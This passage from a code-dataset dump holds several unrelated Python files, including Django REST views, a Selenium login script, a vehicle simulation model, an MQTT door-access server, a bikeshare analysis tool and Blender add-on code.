False\n\nprint(defineXOR(0,0))\nprint(defineXOR(1,0))\nprint(defineXOR(0,1))\nprint(defineXOR(1,1))\nprint(defineXOR(.5,-150))\n\n'''\nideal results:\n0\n1\n1\n0\n'''\n","sub_path":"DEAP_XOR.py","file_name":"DEAP_XOR.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425186452","text":"from remoteomddata.api.serializers.productcategory import ProductCategoryCUSerializer, ProductCategoryDetailSerializer, ProductCategoryListSerializer\nfrom rest_framework.generics import (\n CreateAPIView,\n DestroyAPIView,\n ListAPIView, \n RetrieveAPIView,\n RetrieveUpdateAPIView\n )\nfrom rest_framework.permissions import (\n AllowAny,\n IsAuthenticated,\n IsAdminUser,\n IsAuthenticatedOrReadOnly,\n\n )\n\nfrom remoteomddata.api.permissions import IsOwnerOrReadOnly\nfrom remoteomddata.models.productcategory import ProductCategory\n\n\nclass ProductCategoryCreateAPIView(CreateAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryCUSerializer\n permission_classes = [IsAuthenticated]\n\n def perform_create(self, serializer):\n serializer.save()\n\n\nclass ProductCategoryDetailAPIView(RetrieveAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryDetailSerializer\n lookup_field = 'id'\n #lookup_url_kwarg = \"abc\"\n\n\nclass ProductCategoryUpdateAPIView(RetrieveUpdateAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryCUSerializer\n lookup_field = 'id'\n permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n #lookup_url_kwarg = \"abc\"\n def perform_update(self, serializer):\n serializer.save(user=self.request.user)\n #email send_email\n\n\n\nclass ProductCategoryDeleteAPIView(DestroyAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = 
ProductCategoryDetailSerializer\n lookup_field = 'id'\n #lookup_url_kwarg = \"abc\"\n\nclass ProductCategoryListAPIView(ListAPIView):\n queryset = ProductCategory.objects.all()\n serializer_class = ProductCategoryListSerializer\n\n #def get_queryset()\n\n\n\n","sub_path":"django/remoteomd-old/remoteomddata/api/views/productcategory.py","file_name":"productcategory.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"527578169","text":"import os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nimport sendgrid_helper\nimport logging\n\n\ndef login():\n # Set basicconfig to log events of relatively low severity level (Info) to higher severity level (Error)\n logging.basicConfig(level=logging.INFO)\n logging.info(\"Logging into stackoverflow.com\")\n\n chrome_options = Options()\n chrome_options.binary_location = os.environ.get('GOOGLE_CHROME_SHIM')\n driver = webdriver.Chrome(chrome_options=chrome_options)\n\n try:\n driver.get(\"https://stackoverflow.com\")\n\n driver.find_element_by_link_text(\"Log in\").click()\n\n driver.find_element_by_id(\"email\").send_keys(os.environ['STACK_OVERFLOW_EMAIL'])\n driver.find_element_by_id(\"password\").send_keys(os.environ['STACK_OVERFLOW_PASSWORD'])\n driver.find_element_by_id(\"submit-button\").submit()\n\n driver.find_element_by_class_name(\"my-profile\").click()\n\n elem = driver.find_element_by_class_name(\"mini-avatar\")\n assert os.environ['STACK_OVERFLOW_DISPLAY_NAME'] in elem.text\n logging.info(\"Logged into stackoverflow.com and accessed profile page. \")\n\n except Exception as e:\n message = \"An error occurred while trying to access stackoverflow.com!\"\n logging.error(message, e)\n sendgrid_helper.send_mail(\"Error at login!\", message + str(e))\n\n finally:\n driver.close()\n\n\nif __name__ == \"__main__\":\n login()\n","sub_path":"stack_overflow_page.py","file_name":"stack_overflow_page.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158128216","text":"\"\"\" This module implements a vehicle model.\n\n Vehicle model acts as an instance to modify vehicle's behaviour according to \n\"\"\"\n\nfrom typing import Dict, List\nfrom collections import OrderedDict\nimport itertools\nimport numpy as np\nimport pandas as pd\n\nfrom symupy.utils import constants as ct\n\nfrom .dynamics import VehicleDynamic\n\n\nclass Vehicle(object):\n \"\"\"Class for defining a vehicle\n \"\"\"\n\n counter = itertools.count()\n\n def __init__(\n self,\n abscisa=0.0,\n acceleration=0.0,\n distance=0.0,\n vehid=0,\n ordinate=0.0,\n link=\"\",\n vehtype=\"\",\n speed=0.0,\n lane=0,\n elevation=0.0,\n dynamic=VehicleDynamic(),\n itinerary=[],\n ):\n \"\"\" This initializer creates a Vehicle\n \"\"\"\n self.abscisa = abscisa\n self.acceleration = acceleration\n self.distance = distance\n self.vehid = vehid\n self.ordinate = ordinate\n self.link = link\n self.vehtype = vehtype\n self.speed = speed\n self.lane = lane\n self.elevation = elevation\n self.dynamic = dynamic\n self.itinerary = itinerary\n\n def __repr__(self):\n data_dct = \", \".join(f\"{k}:{v}\" for k, v in self.__dict__.items())\n return f\"{self.__class__.__name__}({data_dct})\"\n\n def __str__(self):\n data_dct = \", \".join(f\"{k}:{v}\" for k, v in self.__dict__.items())\n return f\"{self.__class__.__name__}({data_dct})\"\n\n def update_state(self, dataveh):\n 
\"\"\"Updates data within the structure with \n \n :param dataveh: vehicle \n :type dataveh: Vehicle\n \"\"\"\n self.__dict__.update(**dataveh)\n\n link = getattr(self, \"link\")\n if link not in getattr(self, \"itinerary\"):\n self.itinerary.append(link)\n\n @property\n def C(self):\n \"\"\"Output matrix\"\"\"\n return self.__output_matrix\n\n def activate_sensor(self, **kwargs) -> None:\n \"\"\"Define the observation matrix and observed states in the vehicle\n \n vehicle.activate_sensor(speed=True,position=True)\n \n :return: Set the observation matrix __output_matrix\n :rtype: None\n \"\"\"\n dct_idx = {\"position\": 0, \"speed\": 1, \"acceleration\": 2}\n C = np.zeros([len(kwargs.keys()), 3])\n for key in kwargs.keys():\n idx = dct_idx.get(key)\n C[idx][idx] = kwargs.get(key, 0)\n self.__output_matrix = C\n\n @property\n def vector_state(self) -> np.array:\n \"\"\"Vehicle state vector (x,v,a)\"\"\"\n return np.array((self.distance, self.speed, self.acceleration))\n\n @property\n def observed_state(self) -> np.array:\n \"\"\" Return observed states via C@(x,v,a)\"\"\"\n return self.C @ self.vector_state\n\n def predict_state(self, control) -> np.array:\n \"\"\" Return predicted states via self.dynamic\"\"\"\n return self.dynamic(self, control)\n\n @staticmethod\n def format_dict(dataveh: OrderedDict) -> dict:\n \"\"\" This function creates the dictionary \n {\"abscisa\": float(data),\n \"acceleration\": float(data),\n \"distance\": float(data),\n \"vehid\": int(data),\n \"ordinate\": float(data),\n \"link\": str (data),\n \"vehtype\": str (data),\n \"speed\": float(data),\n \"lane\": int (data),\n \"elevation\": float(data),\n } \n \n :param dataveh: Ordered Dictionary from XML query\n :type dataveh: OrderedDict\n :return: Dictionary as in description\n :rtype: [type]\n \"\"\"\n data = {ct.FIELD_DATA[key]: ct.FIELD_FORMAT[key](val) for key, val in dataveh.items()}\n return data\n\n @classmethod\n def from_response(cls, dataveh: OrderedDict):\n \"\"\"Constructor for the class from a specific dictionary\n \n :param dataveh: Ordered dictionary from XML query\n :type dataveh: OrderedDict\n :return: Vehicle object\n :rtype: [type]\n \"\"\"\n return cls(**Vehicle.format_dict(dataveh))\n\n\nlstordct = List[OrderedDict]\nlstvehs = List[Vehicle]\n\n\nclass VehicleList(object):\n \"\"\"Class for defining a list of vehicles\n \"\"\"\n\n def __init__(self, newvehs: lstvehs):\n self.vehicles = {}\n for veh in newvehs:\n self.vehicles[veh.vehid] = veh\n\n def update_list(self, current_vehs: lstordct):\n \"\"\" Appends a new list of vehicles\n\n :param vehlist: List of vehicles\n :type vehlist: lstordct\n \"\"\"\n # Reformating data in vehicle dict\n current_vehs = [Vehicle.format_dict(veh) for veh in current_vehs]\n\n for veh in current_vehs:\n veh_id = veh.get(\"vehid\")\n if veh_id in self.vehicles.keys():\n # Update existing vehicle\n self.vehicles.get(veh_id).update_state(veh)\n else:\n # Create a new vehicle and append\n self.vehicles[veh_id] = Vehicle(**veh)\n\n def _get_vehicles_attribute(self, attribute: str) -> np.array:\n \"\"\" Retrieve list of parameters \n \n :param attribute: One of the vehicles attribute e.g. 
'distance'\n :type attribute: str\n :return: vector of all parameters\n :rtype: np.array\n \"\"\"\n constructor, ftype = ct.FIELD_FORMATAGG[attribute]\n if ftype:\n return constructor([getattr(veh, attribute) for veh in self], dtype=ftype)\n return [getattr(veh, attribute) for veh in self] # Case str\n\n @property\n def acceleration(self):\n return self._get_vehicles_attribute(\"acceleration\")\n\n @property\n def speed(self):\n return self._get_vehicles_attribute(\"speed\")\n\n @property\n def distance(self):\n return self._get_vehicles_attribute(\"distance\")\n\n def _to_pandas(self) -> pd.DataFrame:\n \"\"\" Transforms vehicle list into a pandas for rendering purposes \n \n :return: Returns a table with pandas data.\n :rtype: pd.DataFrame\n \"\"\"\n\n df_print = pd.DataFrame()\n for key, value in self.vehicles.items():\n df_print = df_print.append(pd.DataFrame(value.__dict__, index=(key,)))\n return df_print\n\n def __str__(self):\n if not self.vehicles:\n return \"No vehicles have been registered\"\n df_to_print = self._to_pandas()\n return str(df_to_print)\n\n def __repr__(self):\n if not self.vehicles:\n return \"No vehicles have been registered\"\n df_to_print = self._to_pandas()\n return repr(df_to_print)\n\n def __iter__(self):\n self.iterveh = iter(self.vehicles.values())\n return self\n\n def __next__(self):\n return next(self.iterveh)\n\n def __contains__(self, veh: Vehicle):\n return veh.vehid in self.get_vehid\n\n def __getitem__(self, key: int):\n return self.vehicles[key]\n\n @classmethod\n def from_request(cls, vehlistdct: lstordct):\n \"\"\"Constructs a vehicle list from a list of ordered dictionaries (simulator repsonse)\n\n :param vehlist: list containing vehicle data in ordered dict format\n :type vehlist: list\n :return: vehicle list containing list of vehicle data classes\n :rtype: VehicleList\n \"\"\"\n return cls([Vehicle.from_response(d) for d in vehlistdct])\n\n @property\n def get_vehid(self):\n return [v.vehid for v in self.vehicles]\n","sub_path":"symupy/components/vehicles/models/vehicles.py","file_name":"vehicles.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405609710","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/18 4:26 PM\n# @Author : zhongch4g\n# @Site : \n# @File : 101. 
Symmetric Tree.py\n# @Software: IntelliJ IDEA\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def isSymmetric(self, root: TreeNode) -> bool:\n # boundary case\n if not root:\n return True\n\n return self.compare(root.left, root.right)\n\n def compare(self, left, right):\n if not left and not right:\n return True\n\n if left and right and left.val == right.val and \\\n self.compare(left.left, right.right) and \\\n self.compare(left.right, right.left):\n return True\n else:\n return False\n\n # Iterative\n def isSymmetric2(self, root: TreeNode) -> bool:\n if not root:\n return True\n stack = [root.left, root.right]\n while stack:\n node1, node2 = stack.pop(), stack.pop()\n if not node1 and not node2:\n continue\n if not node1 or not node2:\n return False\n if node1.val != node2.val:\n return False\n stack.append(node1.right)\n stack.append(node2.left)\n stack.append(node1.left)\n stack.append(node2.right)\n return True\n\n\n\nnode1 = TreeNode(1)\nnode2, node3 = TreeNode(2), TreeNode(2)\nnode4, node5 = None, TreeNode(3)\nnode6, node7 = None, TreeNode(3)\nnode1.left, node1.right = node2, node3\nnode2.left, node2.right = node4, node5\nnode3.left, node3.right = node6, node7\n\nsolution = Solution()\nres = solution.isSymmetric2(node1)\nprint(res)\n\n","sub_path":"LeetCode/101. Symmetric Tree.py","file_name":"101. Symmetric Tree.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34345229","text":"import json\n\nimport pytest\nfrom streamsets.testframework.decorators import stub\n\n\n@pytest.mark.parametrize('stage_attributes', [{'action': 'KEEP'},\n {'action': 'REMOVE'},\n {'action': 'REMOVE_CONSTANT'},\n {'action': 'REMOVE_EMPTY'},\n {'action': 'REMOVE_NULL'},\n {'action': 'REMOVE_NULL_EMPTY'}])\ndef test_action(sdc_builder, sdc_executor, stage_attributes):\n try:\n DATA = dict(name='Al Gore', birthplace='Washington, D.C.', winningYears=None, internetPatents='')\n\n # We'll keep the /name field.\n EXPECTED_KEEP_DATA = dict(name='Al Gore')\n # We'll remove the /name field.\n EXPECTED_REMOVE_DATA = dict(birthplace='Washington, D.C.',\n winningYears=None,\n internetPatents='')\n # We'll ask to remove all fields but set constant to his name.\n EXPECTED_REMOVE_CONSTANT_DATA = dict(birthplace='Washington, D.C.',\n winningYears=None,\n internetPatents='')\n # We'll ask to remove all fields, but only the ones that have empty string values (/internetPatents) will.\n EXPECTED_REMOVE_EMPTY_DATA = dict(name='Al Gore',\n birthplace='Washington, D.C.',\n winningYears=None)\n # We'll ask to remove all fields, but only the ones that have null values (/winningYears) will.\n EXPECTED_REMOVE_NULL_DATA = dict(name='Al Gore',\n birthplace='Washington, D.C.',\n internetPatents='')\n\n # We'll ask to remove all fields, but only the ones that have empty string or null values will.\n EXPECTED_REMOVE_NULL_EMPTY_DATA = dict(name='Al Gore',\n birthplace='Washington, D.C.')\n\n pipeline_builder = sdc_builder.get_pipeline_builder()\n\n dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')\n dev_raw_data_source.data_format = 'JSON'\n dev_raw_data_source.raw_data = json.dumps(DATA)\n\n field_remover = pipeline_builder.add_stage('Field Remover').set_attributes(**stage_attributes)\n if field_remover.action in ('KEEP', 'REMOVE'):\n field_remover.fields = ['/name']\n else:\n field_remover.fields = ['/name', 
'/birthplace', '/winningYears', '/internetPatents']\n if field_remover.action == 'REMOVE_CONSTANT':\n field_remover.constant = 'Al Gore'\n\n trash = pipeline_builder.add_stage('Trash')\n\n dev_raw_data_source >> field_remover >> trash\n pipeline = pipeline_builder.build()\n\n sdc_executor.add_pipeline(pipeline)\n snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot\n record = snapshot[field_remover].output[0]\n assert record.field == locals()[f\"EXPECTED_{field_remover.action}_DATA\"]\n finally:\n sdc_executor.stop_pipeline(pipeline)\n\n\n@pytest.mark.parametrize('stage_attributes', [{'action': 'REMOVE_CONSTANT'}])\ndef test_constant(sdc_builder, sdc_executor, stage_attributes):\n \"\"\":py:function:`stage.configuration.test_field_remover_processor.test_action` covers this case\n as we set the remover to remove all fields, but only provide a constant that matches one.\"\"\"\n test_action(sdc_builder, sdc_executor, stage_attributes)\n\n\ndef test_fields(sdc_builder, sdc_executor):\n \"\"\":py:function:`stage.configuration.test_field_remover_processor.test_action` covers this case\n as we alternately set one field (when keeping or removing individual ones) or all of them.\"\"\"\n test_action(sdc_builder, sdc_executor, dict(action='REMOVE'))\n\n\n@stub\ndef test_preconditions(sdc_builder, sdc_executor):\n pass\n\n\n@stub\ndef test_required_fields(sdc_builder, sdc_executor):\n pass\n\n","sub_path":"stage/configuration/test_field_remover_processor.py","file_name":"test_field_remover_processor.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17365057","text":"\"\"\"microbial URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom .views import MetafileTemplView, UnMetafileListView, SheetNameView, SheetHeaderView, UploadMetafileView, SubmitMetadataView\n\nurlpatterns = [\n path('metafiletmpl', MetafileTemplView.as_view(), name='metafile_templ'),\n path('metafilelist', UnMetafileListView.as_view(), name='metafile_list'),\n path('sheetlist', SheetNameView.as_view(), name='sheet_list'),\n path('sheetheader', SheetHeaderView.as_view(), name='sheet_header'),\n path('metafile', UploadMetafileView.as_view(), name='metafile'),\n path('submit', SubmitMetadataView.as_view(), name='submit_metadata'),\n]\n","sub_path":"backend/metadata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31429503","text":"import Datebase\nimport csv\nfrom datetime import datetime\nfrom datetime import timedelta\nimport paho.mqtt.client as mqtt\n\n#Before_run read README.md\nbroker = \"###\"\nport = 8883\nmqttPassword = \"###\"\nclient = mqtt.Client()\n\ndef handleCloseUp(card_id, terminal_id):\n now = datetime.now()\n recvTimestamp = datetime.timestamp(now)\n cardUser = Datebase.getUserWithCardId(card_id)\n terminal = Datebase.getTerminalWithId(terminal_id)\n if cardUser is None:\n print(\"Card id not registered!\")\n Datebase.logForbiddenAttempt(recvTimestamp, card_id, terminal_id)\n elif terminal is None:\n print(\"Card close up to unregistered terminal!\")\n else:\n print(\"card id '{}' belong to '{}' spotted in terminal nr {} - description '{}', at {}\".format(cardUser.cardId, cardUser.name ,terminal.terminalId,terminal.terminalDescription,now.strftime(\"%d/%m/%Y, %H::%M::%S\")))\n Datebase.logDoorUsage(recvTimestamp, card_id, terminal_id)\n\ndef onMessage(client, userdata, message):\n message_decoded = (str(message.payload.decode(\"utf-8\"))).split(\".\")\n if message_decoded[0] == \"register\":\n Datebase.addNewTerminal(Datebase.Terminal(message_decoded[1], message_decoded[2]))\n client.publish(\"server/ack\", \"ack\" + \".\" + message_decoded[1])\n elif message_decoded[0] == \"closeup\":\n cardId = message_decoded[1]\n terminalId = message_decoded[2]\n handleCloseUp(cardId, terminalId)\n\t\t\ndef init():\n client.tls_set(\"ca.crt\")\n client.username_pw_set(username='server', password=mqttPassword)\n client.connect(broker,port)\n client.on_message = onMessage\n client.loop_start()\n client.subscribe(\"terminal/closeup\")\n client.subscribe(\"terminal/register\")\n\ndef addUser():\n name = input(\"Type name \")\n cardId = input(\"Type card id \")\n Datebase.addNewUser(Datebase.User(cardId,name))\n\ndef addTerminal():\n terminalId = input(\"Type terminal ID \")\n terminalDesc = input(\"Type terminal description \")\n Datebase.addNewTerminal(Datebase.Terminal(terminalId, terminalDesc))\n\ndef removeTerminal():\n terminalId = input(\"Type termina ID to delete \")\n Datebase.removeTerminalById(terminalId)\n\ndef removeUser():\n userName = input(\"Type user name to delete \")\n Datebase.removeUserByName(userName)\n\ndef generateRaport():\n userName = input(\"Type user name of which you want to create raport \")\n user = Datebase.getUserWithName(userName)\n userHistory = Datebase.getUserHistory(user)\n doorAccessTime = [item[1] for item in userHistory]\n entryTime = doorAccessTime[::2]\n exitTime = doorAccessTime[1::2]\n timeInWork = sum(exitTime) - sum(entryTime)\n workHours = timeInWork/3600\n with 
open('raport.csv', mode='a+', newline='') as logFile:\n logWriter = csv.writer(logFile, delimiter=',', quotechar='\"')\n logWriter.writerow([\"{}\".format(user.name), workHours])\n\noperationSwitch = {\n \"1\":addUser,\n \"2\":addTerminal,\n \"3\":removeUser,\n \"4\":removeTerminal,\n \"5\":generateRaport\n}\n\ndef mainLoop():\n print(\"Server options:\")\n print(\"\")\n print(\"1. to add new card\")\n print(\"2. to add new terminal\")\n print(\"3. to remove card (from datebase)\")\n print(\"4. to remove terminal (from datebase)\")\n print(\"5. to generate csv raport\")\n operation = input()\n operationSwitch[operation]()\n\nif __name__ == \"__main__\":\n init()\n while True:\n mainLoop()\n\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554927231","text":"import time\nimport pandas as pd\nCITY_DATA = { 'chicago': pd.read_csv('chicago.csv'),\n 'new york city': pd.read_csv('new_york_city.csv'),\n 'washington': pd.read_csv('washington.csv')\n }\n########################## FUNCTION 1 ###########################\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('\\nHello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n try :\n city = input('Which city would you like to explore? Chicago, New York City, or Washington? \\n').lower()\n if city in list(CITY_DATA.keys()):\n print('\\nYou are exploring {} .......... '.format(city))\n break\n else:\n print('\\nPlease enter a valid city name .\\nConsider typing one of these chicago,new york city or washington.')\n except Exception as e:\n print('Exception occurred {}'.format(e))\n print('\\nPlease enter a valid city name .\\nConsider typing one of these chicago,new york city or washington.\\n')\n\n # get user input for month (all, january, february, ... , june)\n while True:\n try :\n month = input(\"\\nPlease enter a month from ['january', 'february', 'march', 'april', 'may', 'june'] or all. \\n\").lower()\n if month in ['january', 'february', 'march', 'april', 'may', 'june','all']:\n print('\\nData will be filtered by {} ............'.format(month))\n break\n else:\n print(\"\\nPlease enter a valid month.\\nConsider one of the following ['january', 'february', 'march', 'april', 'may', 'june'] or all.\")\n except Exception as e :\n print('{} occurred.'.format(e))\n print(\"\\nPlease enter a valid month.\\nConsider one of the following ['january', 'february', 'march', 'april', 'may', 'june'] or all.\\n\")\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n try :\n day = input('\\nPlease Enter the day you would like to see data for [Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday] or all. 
\\n').lower()\n if day in ['sunday','monday','tuesday','wednesday','thursday','friday','saturday','all']:\n print(\"\\nData is being filtered for {} .\".format(day))\n break\n else:\n print(\"\\nPlease enter a valid day.\\nConsider one of the following [Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday] or all.\\n\")\n except Exception as e :\n print('{} occurred.'.format(e))\n print(\"\\nPlease enter a valid day.\\nConsider one of the following [Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday] or all.\\n\")\n\n\n print('-'*40)\n return city, month, day\n\n######################## FUNCTION 2 #############################\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n df = pd.DataFrame(CITY_DATA.get(city))\n # Converting the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # Extracting month and day of week from Start Time column to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n return df\n\n######################## FUNCTION 3 ##########################\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time() # For displaying time taken\n\n # display the most common month\n common_month = df['month'].mode()\n print('Most popular month : ',common_month)\n # display the most common day of week\n common_day_of_week = df['day_of_week'].mode()\n print('Most popular day of week : ',common_day_of_week)\n # display the most common start hour\n # creating an hour column\n df['hour'] = df['Start Time'].dt.hour\n common_hour = df['hour'].mode()\n print('Most popular hour : ',common_hour)\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n######################### FUNCTION 4 #########################\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n popular_start_station = df['Start Station'].mode()\n print('Most popular Start Station : ',popular_start_station)\n\n # display most commonly used end station\n popular_end_station = df['End Station'].mode()\n print('Most popular End Station : ',popular_end_station)\n\n # display most frequent combination of start station and end station trip\n df['Start_And_End_Station'] = df['Start Station'] + ' , ' + df['End Station']\n popular_start_and_end_station = df['Start_And_End_Station'].mode()\n print('Most Frequent trips are between : 
',popular_start_and_end_station)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n########################### FUNCTION 5 #############################\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print('Total travel time in seconds : ',df['Trip Duration'].sum())\n print('Total travel time in minutes : ',int(df['Trip Duration'].sum()/60))\n\n # display mean travel time\n print('Average travel time in seconds : ',df['Trip Duration'].mean())\n print('Average travel time in minutes : ', int(df['Trip Duration'].mean()/60))\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n############################ FUNCTION 6 ################################\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('User Types : \\n')\n print(df['User Type'].value_counts())\n\n # Display counts of gender\n if 'Gender' in df.columns:\n print('\\nGender information : ')\n print('\\n',df['Gender'].value_counts())\n else:\n print(\" \\nGender information not available. \")\n\n # Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n print('\\nBirth date information : ')\n print('\\nEarliest year of birth : ',df['Birth Year'].min())\n print('Most recent year of birth : ',df['Birth Year'].max())\n print('Common year of birth : ',df['Birth Year'].mode())\n from datetime import date\n today = date.today()\n # creating an age column\n df['age'] = today.year - df['Birth Year']\n print('Most Common age of bike users : ',df['age'].mode())\n\n else:\n print(\"\\nBirth Year information not available.\")\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n############################### FUNCTION 7 ############################\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n print('Data for 5 bike users .')\n for a in range(5):\n print('\\n')\n print(df.iloc[a])\n\n # Displaying data for 5 more users\n b = 5\n c = 10\n while True:\n word = input(\"\\nPlease enter 'Y' if you would like to see data of 5 more bike users else N: \\n \").lower()\n if word == \"y\":\n for a in range(b, c):\n print('\\n')\n print(df.iloc[a])\n b = c\n c = c + 5\n\n elif word == \"n\":\n print(\"Finished.\")\n break\n\n else :\n print('Please enter y or n .')\n\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"210877327","text":"import os\nimport bpy\n\n\ndef project_files_path():\n ''' Consolidate the creation of the path to the project files'''\n\n filepath = os.path.dirname(bpy.data.filepath)\n filepath, dot, blend = bpy.data.filepath.rpartition(os.path.extsep)\n filepath = filepath + \"_files\"\n filepath = os.path.join(filepath, \"mcell\")\n return filepath\n\n\ndef preserve_selection_use_operator(operator, new_obj):\n \"\"\" Preserve current object selection state and use operator.\n\n It is not uncommon for Blender operators to make use of the current\n selection. This means you first have to save the current selection state,\n deselect everything, select the object you actually want to do the\n operation on, execute the operator, deselect that object, and finally\n reselect the original selection state. This sounds silly but can be quite\n useful. \"\"\"\n\n object_list = bpy.context.scene.objects\n selected_objs = [obj for obj in object_list if obj.select]\n # Deselect everything currently selected, so the operator doesn't act on it\n for obj in selected_objs:\n obj.select = False\n # Select the object we actually want the operator to act on, use it, and\n # deselect.\n new_obj.select = True\n operator()\n new_obj.select = False\n # It's annoying if operators change things they shouldn't, so let's restore\n # the originally select objects.\n for obj in selected_objs:\n obj.select = True\n","sub_path":"All_In_One/addons/cellblender/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488044887","text":"import bpy\n\n\"\"\"\nFloatProperty = bpy.types.Lamp.FloatProperty\nIntProperty = bpy.types.Lamp.IntProperty\nBoolProperty = bpy.types.Lamp.BoolProperty\nCollectionProperty = bpy.types.Lamp.CollectionProperty\nEnumProperty = bpy.types.Lamp.EnumProperty\nFloatVectorProperty = bpy.types.Lamp.FloatVectorProperty\nStringProperty = bpy.types.Lamp.StringProperty\nIntVectorProperty = bpy.types.Lamp.IntVectorProperty\n\"\"\"\n\nbpy.types.Lamp.lamp_type = bpy.props.EnumProperty(attr=\"lamp_type\",\n\titems = (\n\t\t(\"Light Type\",\"Light Type\",\"\"),\n\t\t(\"Area\",\"Area\",\"\"),\n\t\t(\"Directional\",\"Directional\",\"\"),\n\t\t#(\"MeshLight\",\"MeshLight\",\"\"),\n\t\t(\"Point\",\"Point\",\"\"),\n\t\t(\"Sphere\",\"Sphere\",\"\"),\n\t\t(\"Spot\",\"Spot\",\"\"),\n\t\t(\"Sun\",\"Sun\",\"\"),\n\t\t(\"IES\",\"IES\",\"\"),\n),default=\"Sun\")\nbpy.types.Lamp.create_geometry = bpy.props.BoolProperty(attr=\"create_geometry\")\nbpy.types.Lamp.infinite = bpy.props.BoolProperty(attr=\"infinite\")\nbpy.types.Lamp.spot_soft_shadows = 